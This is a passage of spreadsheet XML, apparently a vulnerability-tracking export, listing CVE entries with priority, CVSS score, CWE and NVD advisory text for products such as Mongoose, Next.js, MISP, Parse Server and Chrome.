      </c>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to version 7.22, an on-path network attacker with a wildcard certificate for a parent domain can impersonate deeper subdomains to a client using the built-in TLS stack. The mg_tls_verify_cert_san() and mg_tls_verify_cert_cn() functions in src/tls_builtin.c call mg_match(), whose wildcard can cross DNS label boundaries, so a pattern such as *.example.com can match foo.bar.example.com. The resulting hostname verification bypass permits interception and modification of TLS traffic. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73253</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73256</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr"/>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr"/>
      <c r="Q142" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Prior to 7.22, a remote unauthenticated attacker can exploit an HTTP/1.0 reverse-proxy deployment by sending a request with Transfer-Encoding: chunked and conflicting framing. The http_cb() function in src/http.c tests hm.proto.len with an impossible greater-than-eight condition even though mg_http_parse() requires an eight-byte protocol string, so is_http_1_0 is never set. Mongoose consequently processes chunked encoding that an HTTP/1.0 proxy can ignore, enabling request smuggling and unauthorized access or state changes. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73256</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73257</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr"/>
      <c r="Q143" s="5" t="inlineStr">
        <is>
          <t>CWE-444</t>
        </is>
      </c>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>Mongoose is an embedded web server and network library. Priro to version 7.22, a remote unauthenticated attacker can send an HTTP request containing both Content-Length and Transfer-Encoding: chunked. The cl_count and te_count checks in the mg_http_parse() and http_cb() paths in src/http.c accept both headers and prioritize chunked encoding, while a Content-Length-preferring reverse proxy can use a different request boundary. This CL.TE desynchronization can inject requests that access or modify resources in another user context. This issue is fixed in version 7.22.</t>
        </is>
      </c>
      <c r="S143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73257</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75340</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr"/>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr"/>
      <c r="Q144" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>The device metadata import interface /device/instance/{productId}/property-metadata/import of jetlinks community 2.11 is vulnerable to Server-side request forgery (SSRF).</t>
        </is>
      </c>
      <c r="S144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75340</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77337</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr"/>
      <c r="Q145" s="5" t="inlineStr">
        <is>
          <t>CWE-290, CWE-770</t>
        </is>
      </c>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CakePHP Authentication is an authentication plugin for CakePHP that can also be used in PSR-7 based applications. Versions before 2.11.2, from 3.0.0 through 3.3.6, and from 4.0.0 through 4.2.0 allow authentication bypass and potential CPU or memory exhaustion when CookieAuthenticator uses unencrypted, forgeable legacy tokens. This issue is fixed in versions 2.11.2, 3.3.7, and 4.2.1.</t>
        </is>
      </c>
      <c r="S145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77337</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80164</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr"/>
      <c r="Q146" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="R146"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146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80164</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86419</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr"/>
      <c r="K147" s="5" t="inlineStr">
        <is>
          <t>misp-project:misp</t>
        </is>
      </c>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr"/>
      <c r="Q147" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-918</t>
        </is>
      </c>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>Affected versions of MISP contain insufficient validation of server-side outbound HTTP destinations in feed retrieval and TAXII discovery functionality.
In feed processing, redirects were followed without validating the redirect scheme or destination. The original request headers were reused across redirect hops, meaning authentication headers or API credentials configured for a feed could be forwarded to a different host. Redirects could also target internal network resources, resulting in SSRF. The fix adds redirect validation, blocks internal destinations for cross-host redirects, strips configured feed credentials before following redirects to another host, and pins validated DNS results to prevent re-resolution after validation.
The TAXII discovery endpoint had a related incomplete SSRF defense. It used gethostbyname() and compared the result against only a few literal addresses. This missed cases including IPv6 loopback (::1), numeric host encodings such as 0x7f000001, and potentially multiple DNS records. The fix moves TAXII discovery to the shared URL egress validator.
Together, these commits harden MISP's outbound URL handling against alternate-address representations, DNS-related bypasses, unsafe redirects, internal-host access, and cross-host credential forwarding.
Version affected: ≤2.5.45</t>
        </is>
      </c>
      <c r="S147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86419</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87806</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr"/>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr"/>
      <c r="Q148" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>Parse Server versions &lt;= 8.6.87 and &gt;= 9.0.0 &lt; 9.10.1-alpha.7 contain an authentication bypass in the built-in LDAP authentication adapter. The adapter forwarded the client-supplied password to the directory without verifying that a password had been supplied, and treated any non-error response from the directory as proof of authentication. A zero-length credential turns an LDAP simple bind into the unauthenticated authentication mechanism described in RFC 4513 section 5.1.2, which some directories (including Active Directory in its default configuration) answer with success while mapping the connection to anonymous. As a result, an unauthenticated attacker who knows a directory username can obtain a valid session token for that account, resulting in account takeover. Only deployments that enable the LDAP authentication adapter are affected, and deployments whose directory refuses unauthenticated simple bind (such as a stock OpenLDAP configuration) are not exploitable. The issue is fixed in 8.6.88 and 9.10.1-alpha.7, which require the password to be a non-empty string and reject the request before contacting the directory.</t>
        </is>
      </c>
      <c r="S148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87806</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67403</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr"/>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr"/>
      <c r="Q149" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Insufficient tenant-level authorization checks allow authenticated users to access administrative resources belonging to other tenants by specifying a valid non predictable tenant identifier.</t>
        </is>
      </c>
      <c r="S149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67403</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68484</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>support@hackerone.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr"/>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr"/>
      <c r="Q150" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>Cash Collect contains an improper authorization vulnerability in the Sage AR Automation API. Administrative functions do not properly verify user privileges, allowing authenticated low-privileged users to create administrator accounts and obtain elevated privileges.</t>
        </is>
      </c>
      <c r="S150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68484</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75604</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="n">
        <v>0.025</v>
      </c>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr"/>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr"/>
      <c r="M151" s="5" t="inlineStr"/>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr"/>
      <c r="Q151" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>Next.js is a React framework for building full-stack web applications. From 13.4.0 until 15.5.24 and 16.3.3, Next.js applications using Pages Router or App Router without Cache Components on Windows-hosted servers do not consistently escape backslashes in route segments before constructing incremental-cache paths. In packages/next/src/shared/lib/router/utils/escape-path-delimiters.ts and packages/next/src/server/lib/incremental-cache/file-system-cache.ts, a remote request can supply encoded Windows path separators that traverse outside the intended cache root and expose private build data, including the server-reference-manifest encryption key. Disclosure of that key can enable remote code execution in the affected application. This issue is fixed in versions 15.5.24 and 16.3.3.</t>
        </is>
      </c>
      <c r="S151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75604</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87613</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr"/>
      <c r="K152" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr"/>
      <c r="Q152" s="5" t="inlineStr">
        <is>
          <t>CWE-706</t>
        </is>
      </c>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>Incorrect reference resolution in Extensions in Google Chrome prior to 153.0.8010.36 allowed a remote attacker to potentially execute arbitrary code outside the sandbox via crafted network traffic. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87613</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87911</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>ff89ba41-3aa1-4d27-914a-91399e9639e5</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>postgresql</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr"/>
      <c r="Q153" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-78</t>
        </is>
      </c>
      <c r="R153"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S153" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87911</t>
        </is>
      </c>
    </row>
    <row r="154">
      <c r="A154" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B154" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C154" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30864</t>
        </is>
      </c>
      <c r="D154" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E154" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F154" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G154" s="5" t="inlineStr"/>
      <c r="H154" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I154" s="5" t="inlineStr"/>
      <c r="J154" s="5" t="inlineStr"/>
      <c r="K154" s="5" t="inlineStr"/>
      <c r="L154" s="5" t="inlineStr"/>
      <c r="M154" s="5" t="inlineStr"/>
      <c r="N154" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O154" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="P154" s="5" t="inlineStr"/>
      <c r="Q154" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R154" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web-based IT service management tool. Prior to 3.2.3, iTop is vulnerable to Reflected Cross-Site Scripting (XSS) in the dashboard revert functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S154" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30864</t>
        </is>
      </c>
    </row>
    <row r="155">
      <c r="A155" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B155" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C155" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79921</t>
        </is>
      </c>
      <c r="D155" s="5" t="n">
        <v>8.9</v>
      </c>
      <c r="E155" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F155" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G155" s="5" t="inlineStr"/>
      <c r="H155" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I155" s="5" t="inlineStr"/>
      <c r="J155" s="5" t="inlineStr"/>
      <c r="K155" s="5" t="inlineStr"/>
      <c r="L155" s="5" t="inlineStr"/>
      <c r="M155" s="5" t="inlineStr"/>
      <c r="N155" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O155" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P155" s="5" t="inlineStr"/>
      <c r="Q155" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="R155" s="5" t="inlineStr">
        <is>
          <t>amqp091-go is a Go AMQP 0.9.1 client. Before version 1.13.0, a compromised or malicious AMQP broker can force the client to allocate resources for and process content body frames that exceed the negotiated frame_max limit. This can lead to unexpected memory consumption or application-layer denial of service (DoS), bypassing the protocol's built-in framing constraints. Version 1.13.0 contains a fix. No known workarounds are available.</t>
        </is>
      </c>
      <c r="S155" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79921</t>
        </is>
      </c>
    </row>
    <row r="156">
      <c r="A156" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B156" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C156" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-56798</t>
        </is>
      </c>
      <c r="D156" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E156" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F156" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G156" s="5" t="inlineStr"/>
      <c r="H156" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I156" s="5" t="inlineStr"/>
      <c r="J156" s="5" t="inlineStr"/>
      <c r="K156" s="5" t="inlineStr"/>
      <c r="L156" s="5" t="inlineStr"/>
      <c r="M156" s="5" t="inlineStr"/>
      <c r="N156" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O156" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P156" s="5" t="inlineStr"/>
      <c r="Q156" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R156" s="5" t="inlineStr">
        <is>
          <t>Cross-Site Request Forgery (CSRF) vulnerability in Lime Technology, Inc.'s Unraid OS version 6.12.14 and earlier allows remote attackers to escalate privileges via the Unraid authentication cookie's lax same-site policy.</t>
        </is>
      </c>
      <c r="S156" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-56798</t>
        </is>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B157" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C157" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14359</t>
        </is>
      </c>
      <c r="D157" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E157" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F157" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G157" s="5" t="inlineStr"/>
      <c r="H157" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I157" s="5" t="inlineStr"/>
      <c r="J157" s="5" t="inlineStr"/>
      <c r="K157" s="5" t="inlineStr"/>
      <c r="L157" s="5" t="inlineStr"/>
      <c r="M157" s="5" t="inlineStr"/>
      <c r="N157" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O157" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P157" s="5" t="inlineStr"/>
      <c r="Q157" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R157" s="5" t="inlineStr">
        <is>
          <t>The YITH WooCommerce Waitlist Premium plugin for WordPress is vulnerable to Privilege Escalation in versions up to, and including, 3.35.0. This is due to the add_user_in_waiting_list() function registered on the wp_ajax_yith_wcwtl_add_user action being missing both a capability check and a nonce verification, and using parse_str() + extract() to import attacker-controlled variables from $_POST['params'] that are then passed to wp_create_user() and $user-&gt;set_role(). This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator by creating a new user account and assigning it the administrator role.</t>
        </is>
      </c>
      <c r="S157" s="6" t="inlineStr">
        <is>
